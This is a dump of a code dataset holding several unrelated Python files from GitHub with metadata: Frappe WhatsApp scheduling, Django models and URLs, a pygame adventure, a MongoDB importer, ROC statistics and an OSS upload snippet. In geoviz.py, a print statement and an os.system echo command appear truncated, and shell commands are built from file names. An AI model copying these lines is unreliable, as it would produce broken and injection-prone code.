'application/json'\n\t\t\t}\n\n\t\tresponse = requests.request(\"POST\", url, headers=headers, data=payload)\n\t\tprint(response.text)\n\t\treturn response.text\n#\t\t\tprint(number)\n\n#\t\tprint(messagebird_token)\n#\t\tprint(whatsapp_token)\n#\t\tprint(message)\n\n#\tdef after_insert(self):\n#\t\tself.append('campaign_status',{'title':self.name,'sent_status':'0','pending_status':'0','read_status':'0','failed_status':'0'})\n#\t\tself.save()\n\n#\t@frappe.whitelist()\n#\tdef update_status(self):\n#\t\tsent = frappe.db.get_values(\"Whatsapp Messages\",{'campaign':self.name,'status':'SENT'}, 'name', as_dict=1)\n#\t\tprint(f'\\n\\nCamp list{sent}')\n#\t\tdoc = frappe.get_doc('Whatsapp Status',self.name)\n#\t\tprint('f\\n\\n Doctype{doc.name}')\n#\t\tdoc.sent_status = len(sent)\n#\t\tdoc.save()\n\ndef process_scheduled_whatsapp_message():\n\tposts = frappe.get_list(\n\t\t\"Whatsapp Post\",\n\t\tfilters={\"post_status\": \"Scheduled\", \"docstatus\": 1},\n\t\tfields=[\"name\", \"scheduled_time\"],\n\t)\n\tstart = frappe.utils.now_datetime()\n\tend = start + datetime.timedelta(minutes=10)\n\tfor post in posts:\n\t\tif post.scheduled_time:\n\t\t\tpost_time = frappe.utils.get_datetime(post.scheduled_time)\n\t\t\tif post_time > start and post_time <= end:\n\t\t\t\twhatsapp_post = frappe.get_doc(\"Whatsapp Post\", post.name)\n\t\t\t\twhatsapp_post.message_post()\n", "repo_name": "HarshMagiya7/messaging-blaster", "sub_path": "contact_grouping/contact_grouping/doctype/whatsapp_post/whatsapp_post.py", "file_name": "whatsapp_post.py", "file_ext": "py", "file_size_in_byte": 4912, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "frappe.model.document.Document", "line_number": 12, "usage_type": "name"}, {"api_name": "frappe.utils.now_datetime", "line_number": 15, "usage_type": "call"}, {"api_name": "frappe.utils", "line_number": 15, "usage_type": "attribute"}, {"api_name": "frappe.utils.get_datetime", "line_number": 16, "usage_type": "call"}, {"api_name": "frappe.utils", "line_number": 16, "usage_type": "attribute"}, {"api_name": "frappe.throw", "line_number": 18, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 23, "usage_type": "call"}, {"api_name": "frappe.throw", "line_number": 27, "usage_type": "call"}, {"api_name": "frappe.get_single", 
"line_number": 41, "usage_type": "call"}, {"api_name": "frappe.get_value", "line_number": 44, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 48, "usage_type": "call"}, {"api_name": "frappe.get_value", "line_number": 52, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 52, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 55, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 73, "usage_type": "call"}, {"api_name": "frappe.utils.now_datetime", "line_number": 74, "usage_type": "call"}, {"api_name": "frappe.utils", "line_number": 74, "usage_type": "attribute"}, {"api_name": "frappe.get_doc", "line_number": 74, "usage_type": "call"}, {"api_name": "frappe.db.set_value", "line_number": 77, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 77, "usage_type": "attribute"}, {"api_name": "frappe.db.commit", "line_number": 78, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 78, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 36, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 82, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 103, "usage_type": "call"}, {"api_name": "frappe.get_list", "line_number": 126, "usage_type": "call"}, {"api_name": "frappe.utils.now_datetime", "line_number": 131, "usage_type": "call"}, {"api_name": "frappe.utils", "line_number": 131, "usage_type": "attribute"}, {"api_name": "datetime.datetime.timedelta", "line_number": 132, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 132, "usage_type": "name"}, {"api_name": "frappe.utils.get_datetime", "line_number": 135, "usage_type": "call"}, {"api_name": "frappe.utils", "line_number": 135, "usage_type": "attribute"}, {"api_name": "frappe.get_doc", "line_number": 137, "usage_type": "call"}]} +{"seq_id": "33181584374", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('lessons', '0010_auto_20140926_1909'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='practice',\n name='timing_and_music',\n field=models.ForeignKey(blank=True, to='lessons.Instructor', null=True),\n preserve_default=True,\n ),\n ]\n", "repo_name": "swoloszynski/salsa-lessons", "sub_path": "lessons/migrations/0011_practice_timing_and_music.py", "file_name": "0011_practice_timing_and_music.py", "file_ext": "py", "file_size_in_byte": 481, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "26867401270", "text": "from typing import Any\nfrom django.db import models\nfrom django.utils import timezone\nfrom datetime import datetime\n# Create your models here.\n\n\n\n\nclass UserInfo(models.Model):\n \"\"\"用户表\"\"\"\n name = models.CharField(verbose_name=\"姓名\",max_length=32)\n password = models.CharField(verbose_name=\"密码\",max_length=64)\n age = 
models.IntegerField(verbose_name=\"年龄\",default=0)\n account = models.DecimalField(verbose_name=\"账户余额\",max_digits=10,decimal_places=2,default=0)\n create_time = models.DateTimeField(verbose_name=\"入职时间\") #default=timezone.now ,default=datetime.now()\n\n\n #有关联的\n # -to 与哪张表关联\n # -to_field 与表中的列关联\n #生成数据列 depart_id\n \n\n #1.部门id置空\n # on_delete=models.CASCADE,null=True,blank=True \n # 2.部门删除;\n # on_delete=models.CASCADE删除用户 \n depart = models.ForeignKey(verbose_name='部门',to=\"Department\",to_field=\"id\",on_delete=models.SET_NULL,null=True,blank=True)\n\n gender_choices = (\n (1,\"男\"),\n (2,\"女\"),\n )\n gender = models.SmallIntegerField(verbose_name=\"性别\",choices=gender_choices)\n\n\n\nclass Department(models.Model):\n \"\"\"\"部门表\"\"\"\n title = models.CharField(verbose_name=\"部门\",max_length=32)\n\n #返回对象\n def __str__(self):\n return self.title\n\nclass Prettynumber(models.Model):\n \"\"\"号码池\"\"\"\n phone = models.CharField(verbose_name=\"手机号\",max_length=11)\n price = models.IntegerField(verbose_name=\"价格\",default=0)\n\n\n level_choices = (\n (1,\"1级用户\"), \n (2,\"2级用户\"),\n (3,\"3级用户\"),\n (4,\"4级用户\"),\n )\n level = models.SmallIntegerField(verbose_name=\"等级\",choices=level_choices)\n\n status_choices = (\n (1,\"占用\"),\n (2,\"未占用\"),\n )\n status = models.SmallIntegerField(verbose_name=\"状态\",choices=status_choices)\n \n #返回对象\n def __str__(self):\n return self.phone\n", "repo_name": "373106698/django", "sub_path": "app01/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1996, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.db.models.Model", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 10, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 12, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 12, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 13, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 13, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.DecimalField", "line_number": 15, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 16, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 16, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.db.models.SET_NULL", "line_number": 29, "usage_type": "attribute"}, {"api_name": "django.db.models.SmallIntegerField", "line_number": 35, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 35, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 41, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 41, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 47, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 47, "usage_type": "name"}, {"api_name": 
"django.db.models.CharField", "line_number": 49, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 49, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 50, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 50, "usage_type": "name"}, {"api_name": "django.db.models.SmallIntegerField", "line_number": 59, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 59, "usage_type": "name"}, {"api_name": "django.db.models.SmallIntegerField", "line_number": 65, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 65, "usage_type": "name"}]} +{"seq_id": "12072223724", "text": "import getopt\nimport sys\nimport cli\nimport os\nfrom solver import dispatch\nfrom step import geolog, solverviz\nimport html\n\ndef parse_cl():\n \"\"\" Parse command line \"\"\"\n additionnal_options = []\n # First check for a configuration file in working directory\n if os.path.isfile(\"./geoviz.conf\"):\n config_file = open(\"./geoviz.conf\")\n additionnal_options = config_file.read().replace('\\n', '').split(' ')\n config_file.close\n\n arg_list = additionnal_options + sys.argv[1:]\n print(arg_list)\n return getopt.getopt(arg_list, cli.shortoptions, cli.longoptions)\n\ndef handle_cl(args):\n \"\"\" Execute according to options. Leaving remaining value-options (and\n positional arguments) in a dictionnary \"\"\"\n\n # Fill dictionnary with default values\n opt_dict = {\n '--geolog_path': \"./Geolog\",\n '--solverviz_path': \"./SolverViz\",\n '--solver': \"proge\",\n '--graphics': \"geogebra\",\n '--output': \"out\",\n '--keep_files': False\n }\n\n # For each argument, fill the dictionnary or take corresponding action\n for opt, val in args[0]:\n if opt == '-h' or opt == '--help':\n print_help()\n exit()\n if opt == '-v' or opt == '--version':\n print_version()\n exit()\n # Translate corresponding short / long options\n if opt in cli.options_corres.keys():\n opt = cli.options_corres[opt]\n # Fill the dictionnary\n opt_dict[opt] = val\n if opt == '--keep_files':\n opt_dict['--keep_files'] = True\n\n if not ('--solver_path' in opt_dict.keys()):\n if opt_dict['--solver'] == 'proge':\n opt_dict['--solver_path'] = './Proge'\n\n # If the number of positional arguments is incorrect, print usage and exit\n if len(args[1]) != 1:\n print_usage()\n exit(1)\n opt_dict['input_file'] = args[1][0]\n return opt_dict\n\ndef print_version():\n print(f\"Geoviz v{cli.version}\")\n\ndef print_help():\n \"\"\" Print help string \"\"\"\n print_version()\n print_usage()\n print(\"Options: \")\n for opt, help_string in cli.options_info:\n print(\"{0: <15s} {1: \")\n\nif __name__ == '__main__':\n # Start by parsing command line arguments\n options = handle_cl(parse_cl())\n\n # Initialize cleanup list\n cleanup = []\n\n print(f\"Creating and running language layer...\")\n # Create our first layer (geolog)\n language_layer = geolog.Geolog(options['--geolog_path'],\n options['input_file'], \"tmp\")\n language_layer.set_solver(options['--solver'])\n # Run language layer\n inter_file = language_layer.run()\n cleanup.append(inter_file)\n\n print(f\"Creating and running solver layer...\")\n # Create solver layer\n solve = dispatch.instanciate_solver(options['--solver'],\n options['--solver_path'], inter_file, \"tmp\")\n # Run solver layers\n viz_file = solve.run()\n print(viz_file)\n cleanup.append(viz_file)\n\n # We're going to add the input file as text in the figure\n # First, read the input file\n file = open(options['input_file'], \"r\")\n 
file_string = \"\\\"\" + file.read() + \"\\\"\"\n file_string = file_string.replace(\"\\n\", \"\\\\\\\\n\")\n escaped_string = html.escape(file_string)\n file.close()\n\n # Then append the text to the viz file\n command = f\"echo '\\n' >> {viz_file}\"\n print(f\"Adding statement to figure command: {command}\")\n if os.system(command) != 0:\n print(\"Failed to add the problem statement in the graphic file\")\n\n\n\n print(f\"Creating and running graphic layer...\")\n # Create graphic export layer\n graphic_layer = solverviz.SolverViz(options['--solverviz_path'], viz_file,\n options['--output'])\n # Specify the display backend to use\n graphic_layer.set_display(options['--graphics'])\n # Run graphic export layer\n out_file = graphic_layer.run()\n\n if not options['--keep_files']:\n for file in cleanup:\n if os.system(f\"rm {file}\") != 0:\n print(\"File cleanup failed !\")\n", "repo_name": "Raphalex46/GeoViz", "sub_path": "src/geoviz.py", "file_name": "geoviz.py", "file_ext": "py", "file_size_in_byte": 4254, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.isfile", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 18, "usage_type": "attribute"}, {"api_name": "getopt.getopt", "line_number": 20, "usage_type": "call"}, {"api_name": "cli.shortoptions", "line_number": 20, "usage_type": "attribute"}, {"api_name": "cli.longoptions", "line_number": 20, "usage_type": "attribute"}, {"api_name": "cli.options_corres.keys", "line_number": 45, "usage_type": "call"}, {"api_name": "cli.options_corres", "line_number": 45, "usage_type": "attribute"}, {"api_name": "cli.options_corres", "line_number": 46, "usage_type": "attribute"}, {"api_name": "cli.version", "line_number": 64, "usage_type": "attribute"}, {"api_name": "cli.options_info", "line_number": 71, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 76, "usage_type": "attribute"}, {"api_name": "step.geolog.Geolog", "line_number": 87, "usage_type": "call"}, {"api_name": "step.geolog", "line_number": 87, "usage_type": "name"}, {"api_name": "solver.dispatch.instanciate_solver", "line_number": 96, "usage_type": "call"}, {"api_name": "solver.dispatch", "line_number": 96, "usage_type": "name"}, {"api_name": "html.escape", "line_number": 108, "usage_type": "call"}, {"api_name": "os.system", "line_number": 115, "usage_type": "call"}, {"api_name": "step.solverviz.SolverViz", "line_number": 122, "usage_type": "call"}, {"api_name": "step.solverviz", "line_number": 122, "usage_type": "name"}, {"api_name": "os.system", "line_number": 131, "usage_type": "call"}]} +{"seq_id": "24968508661", "text": "from django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n path('mascaras//', views.mostrar_mascara, name='mostrar_mascara'),\n path('mascaras/alteracao///', views.mostrar_mascara_adaptada, name='mostrar_mascara_adaptada'),\n\n path('mascaras/diagnosticos//', views.mostrar_mascara_builder, name='mostrar_mascara_buider'),\n path('mascaras/nova', views.nova_mascara, name='nova_mascara'),\n path('premium', views.premium, name='premium'),\n path('pagamento/', views.pagamento, name='pagamento'),\n path('vencimento/', views.vencimento, name='vencimento'),\n path('pagamento/aprovado/', views.pagamento_aprovado, name='pagamento_aprovado'),\n path('pagamento/recusado/', views.pagamento_recusado, name='pagamento_recusado'),\n path('pagamento/pendente/', views.pagamento_pendente, name='pagamento_pendente'),\n\n path('mascaras/copiar', views.copiar_mascaras, name='copiar_mascaras'),\n\n path('mascaras/nova/adicionar', views.adicionar_nova_mascara, name='adicionar_nova_mascara'),\n path('', views.entrar, name='entrar'),\n path('login', views.login_usuario, name='login_usuario'),\n path('cadastrar', views.cadastrar, name='cadastrar'),\n path('voucher', views.voucher, name='voucher'),\n\n path('logout', views.logout_usuario, name='logout_usuario'),\n path('mascaras', views.mostrar_mascaras, name='mostrar_mascaras'),\n path('salvaralteracao/', views.adicionar_alteracao, name='adicionar_alteracao'),\n path('mascaras/variaveis/adicionar', views.adicionar_variaveis, name='adicionar_variaveis'),\n path('configuracoes', views.configuracoes, name='configuracoes'),\n path('configuracoes/editarmascara//', views.editar_mascara, name='editar_mascara'),\n path('copiar_tudo//', views.copiar_tudo, name='copiar_tudo'),\n\n path('configuracoes/editarmascara//salvar', views.salvar_edicao, name='salvar_edicao'),\n path('configuracoes/editaralteracao///', views.editar_alteracao, name='editar_alteracao'),\n path('alteracao/salvaralteracao', views.salvar_alteracao, name='salvar_alteracao'),\n path('upvote/', views.upvote_frase, name='upvote_frase'),\n path('users/validate//', views.activate, name='activate'),\n path('resetarpwd/', views.resetar_password, name='resetar_password'),\n path('linkreset/', views.link_reset, name='link_reset'),\n path('users/resetpwd//', views.resetar_password_confirm, name='resetar_password_confirm'),\n path('confirmarreset//', views.confirmar_reset, name='confirmar_reset'),\n path('ajuda', views.sobre, name='sobre'),\n path('salvarconfiguracoes', views.salvar_configuracoes, name='salvar_configuracoes'),\n path('configuracoes/excluirmascara//', views.excluir_mascara, name='excluir_mascara'),\n path('configuracoes/excluiralteracao//', views.excluir_alteracao, name='excluir_alteracao'),\n path('sobre/descricao', views.descricao, name='descricao'),\n path('eula', views.termos, name='termos'),\n path('quemsomos', views.quemsomos, name='quemsomos'),\n path('compendio', views.comunidade, name='comunidade'),\n path('entrar', views.mostrar_index, name='mostrar_index'),\n path('contato/anonimo', views.contato, name='contato'),\n path('contato', views.contato_login, name='contato_login'),\n path('enviarmensagem', views.enviar_mensagem, name='enviar_mensagem'),\n path('compendio/copiar/alteracao////', views.copiar_alteracao, name='copiar_alteracao')\n\n]\n", "repo_name": "netofarthur/laudario", "sub_path": "laudario/masks/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 3708, "program_lang": "python", "lang": "gl", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": 
"django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 29, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 30, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 32, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 35, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 36, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 37, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 38, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 39, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 40, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 41, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 42, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 43, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 44, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 45, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 46, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 47, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 48, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 49, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 50, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 51, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 52, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 53, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 54, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "4443633808", "text": "#!/usr/bin/python3\n\nfrom rpg_characters import Player\nimport rpg_figures as rpf\nfrom art import *\nimport pygame\nimport 
os\n\npygame.init()\npygame.font.init()\npygame.mixer.init()\n\ns = 'sound'\nstart_room_int = \"Hall\"\n\n\nclass Game:\n    def __init__(self, start_room: str):\n        self.player = Player(start_room)\n        self.audio_off = False\n        self.game_music = pygame.mixer.music\n\n    def switch_music(self):\n\n        if self.player.room.this_room == \"Catacombs\" or self.player.room.this_room == \"Pagan Altar\":\n            location_audio = \"Sewer-Monsters-Town-Hall-Meeting_Looping.mp3\"\n            self.game_music.stop()\n            self.game_music.unload()\n        elif self.player.room.this_room == \"Library\":\n            location_audio = \"Closing-In_Looping.mp3\"\n            self.game_music.stop()\n            self.game_music.unload()\n        else:\n            print(\"we in the music\", self.player.room.this_room)\n            location_audio = \"City-of-the-Disturbed_Looping.mp3\"\n\n        self.game_music.load(os.path.join(s, location_audio))\n        self.game_music.set_volume(0.15)\n        self.game_music.play(-1)\n\n    def toggle_audio(self):\n        if not self.audio_off:\n            self.game_music.fadeout(3)\n            self.game_music.unload()\n            return self.switch_music()\n        else:\n            return self.game_music.stop()\n\n    def title_screen(self):\n        self.game_music.load(os.path.join(s, \"Horror-Game-Intro.mp3\"))\n        self.game_music.set_volume(0.15)\n        self.game_music.play(-1)\n\n        # print a main menu and the commands\n        rpf.haunted_hill_house_render()\n        tprint('''\n                        the\n              haunting''', \"amcaaa01\")\n\n        user_audio = input('To turn off audio type T + Enter, otherwise press Enter to begin: ').upper()\n\n        if user_audio == 'T':\n            self.audio_off = True\n            self.toggle_audio()\n\n    def game_loop_start(self):\n\n        while True:\n            self.player.show_status()\n\n            # get the player's next 'move'\n            # .split() breaks it up into a list,\n            # e.g. typing 'go east' would give the list:\n            # ['go','east']\n            move = ''\n            while move == '':\n                move = input('>>> ')\n\n            self.player.player_action(move)\n            # self.switch_music()\n\n            # Define how a player can win\n            if self.player.room.this_room == 'Garden' and 'key' in self.player.inventory and \\\n                    'potion' in self.player.inventory:\n                print('You escaped the house with the ultra rare key and magic potion... 
YOU WIN!')\n break\n\n\ndef main():\n start_game = Game(start_room_int)\n start_game.title_screen()\n start_game.game_loop_start()\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "c23-repo/mycode", "sub_path": "rpg_game/rpg_game_starter.py", "file_name": "rpg_game_starter.py", "file_ext": "py", "file_size_in_byte": 2786, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.init", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.font.init", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.mixer.init", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 11, "usage_type": "attribute"}, {"api_name": "rpg_characters.Player", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "rpg_figures.haunted_hill_house_render", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "25022558824", "text": "# This is just a simple mongo Connector used to\n# Fill a db \"olimpiadi\" with a collection named \"atleti\"\n# that contains all the atlethes from the CSV source file.\n\n# To run this script you can simply run from a terminal:\n# python import_athletes.py athletes_sochi.csv\n\nfrom pymongo import MongoClient\nclient = MongoClient('mongodb://localhost:27017/')\n\ndb = client.olimpiadi\n\n# DATA FORMAT\n# age,birthdate,gender,height,name,weight,\n# gold_medals,silver_medals,bronze_medals,\n# total_medals,sport,country\n\nwith open('athletes_sochi.csv', 'r') as file:\n for line in file.readlines():\n splitted = line.split(',')\n if splitted[0] != 'age':\n data = {'age':splitted[0],\n 'birthdate':splitted[1],\n 'gender':splitted[2],\n 'height':splitted[3],\n 'name':splitted[4],\n 'weight':splitted[5],\n 'gold_medals':int(splitted[6]),\n 'silver_medals':int(splitted[7]),\n 'bronze_medals':int(splitted[8]),\n 'total_medals':int(splitted[9]),\n 'sport':splitted[10],\n 'country':splitted[11][:-2]}\n db.atleti.insert(data)\n\n\n# Instead to use the python script we can also use MONGOIMPORT\n# provided by MongoDB itself:\n\n# mongoimport --db olimpiadi --collection atleti --file atleti.json\n\n# To export the entire collection we can use MONGOEXPORT:\n\n# mongoexport --db olimpiadi --collection atleti --out atleti.json\n", "repo_name": "mnazzario/BigDataAcademy", "sub_path": "development/07_MONGODB/import_atleti/import_athletes.py", "file_name": "import_athletes.py", "file_ext": "py", "file_size_in_byte": 1491, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pymongo.MongoClient", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "34113456871", "text": "from collections import deque\r\nclass MovingAverage:\r\n # add the new val to sum, if nums size exceeds given size, pop and decrement by the first item\r\n def __init__(self, size: int):\r\n \"\"\"\r\n Initialize your data structure here.\r\n \"\"\"\r\n self.size = size\r\n self.nums = deque()\r\n self.sum = 0\r\n \r\n\r\n def next(self, val: int) -> float:\r\n if len(self.nums) < 
self.size:\r\n            self.sum += val\r\n        else:\r\n            self.sum += val - self.nums.popleft()\r\n        self.nums.append(val)\r\n        return self.sum / len(self.nums)\r\n", "repo_name": "HaoboChen1887/leetcode", "sub_path": "design/346_moving_avergae_from_data_stream/346.py", "file_name": "346.py", "file_ext": "py", "file_size_in_byte": 598, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.deque", "line_number": 9, "usage_type": "call"}]}
+{"seq_id": "74783452004", "text": "import os\nimport numpy as np\nimport pandas as pd\nimport pickle\nfrom statistics.plot_roc import plot_roc\nfrom statistics.roc_bootstrap import roc_bootstrap\n\n\n\ndef roc_all(cls_task, level, bootstrap, color, save_dir, fn_df_pred):\n\n    df_sum = pd.read_csv(os.path.join(save_dir, fn_df_pred))\n\n    if level == 'img':\n        y_true = df_sum[cls_task].to_numpy()\n        y_pred = df_sum['y_pred'].to_numpy()\n        print_info = 'roc image:'\n    elif level == 'patient_mean_prob':\n        df_mean = df_sum.groupby(['ID']).mean()\n        y_true = df_mean[cls_task].to_numpy()\n        y_pred = df_mean['y_pred'].to_numpy()\n        print_info = 'roc patient prob:'\n    elif level == 'patient_mean_pos':\n        df_mean = df_sum.groupby(['ID']).mean()\n        y_true = df_mean[cls_task].to_numpy()\n        y_pred = df_mean['y_pred_class'].to_numpy()\n        print_info = 'roc patient pos:'\n    \n    auc = plot_roc(\n        save_dir=save_dir,\n        y_true=y_true,\n        y_pred=y_pred,\n        level=level,\n        color='blue'\n    )\n    ### calculate roc, tpr, tnr with 1000 bootstrap\n    stat = roc_bootstrap(\n        bootstrap=bootstrap,\n        y_true=y_true,\n        y_pred=y_pred\n    )\n\n    print(print_info)\n    print(stat)\n\n    return stat\n\n", "repo_name": "xmuyzz/DeepPLGG", "sub_path": "src/statistics/roc_all.py", "file_name": "roc_all.py", "file_ext": "py", "file_size_in_byte": 1250, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "statistics.plot_roc.plot_roc", "line_number": 29, "usage_type": "call"}, {"api_name": "statistics.roc_bootstrap.roc_bootstrap", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "11518861045", "text": "#!/usr/bin/python\n# -*-coding:utf-8-*-\n\n# -*- coding: utf-8 -*-\nimport oss2,os\n\n# The AccessKey of an Alibaba Cloud root account has access to all APIs and is therefore high-risk. It is strongly recommended to create and use a RAM account for API access and day-to-day operations; log in at https://ram.console.aliyun.com to create a RAM account.\nauth = oss2.Auth('', '')\n# The endpoint below uses Hangzhou as an example; fill in the actual region as appropriate.\nbucket = oss2.Bucket(auth, 'http://oss-cn-hangzhou.aliyuncs.com', '')\n# The file must be opened in binary mode, because the number of bytes it contains has to be known.\nwith open('', 'rb') as fileobj:\n    # The seek method sets reading/writing to start at the 1000th byte. The upload will start from the 1000th byte you specified and continue to the end of the file.\n    fileobj.seek(1000, os.SEEK_SET)\n    # The tell method returns the current position.\n    current = fileobj.tell()\n    bucket.put_object('', fileobj)", "repo_name": "jiaziming/new-old", "sub_path": "day6-面向对象/11111.py", "file_name": "11111.py", "file_ext": "py", "file_size_in_byte": 956, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "oss2.Auth", "line_number": 8, "usage_type": "call"}, {"api_name": "oss2.Bucket", "line_number": 10, "usage_type": "call"}, {"api_name": 